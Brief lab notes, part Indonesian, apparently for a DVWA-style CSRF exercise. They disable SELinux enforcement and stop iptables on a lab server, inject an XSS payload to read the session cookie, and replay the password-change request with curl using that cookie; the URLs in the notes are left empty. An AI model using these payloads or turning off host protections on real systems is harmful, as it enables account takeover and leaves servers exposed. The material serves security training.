Cross Site Request Forgery

Server :


If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.

Place selinux harusnya mode disable

ubah current mode permissive :

echo 0 > /selinux/enforce

disable firewall :

service iptables save
service iptables stop

Client :

Masuk CSRF

New password: abc123
Confirm new password: abc123
Click Change

copy url setelah ganti password

taruh di text editor / untitled (A)


login dengan password baru

masuk ke XSS reflected

What's your Name? <script>alert(document.cookie)</script>
Click Submit

copy isi alert nya

paste di file tadi (B)

curl --cookie "B" --location "A"

jadinya :

curl --cookie "security=low; PHPSESSID=3juclcme0enmmhns9t36mi4ij0" --location ""

ubah password :

curl --cookie "security=low; PHPSESSID=3juclcme0enmmhns9t36mi4ij0" --location ""

masuk terminal

<ubah password> | grep "Password Changed" | tee curl.txt

silahkan logout dan login lagi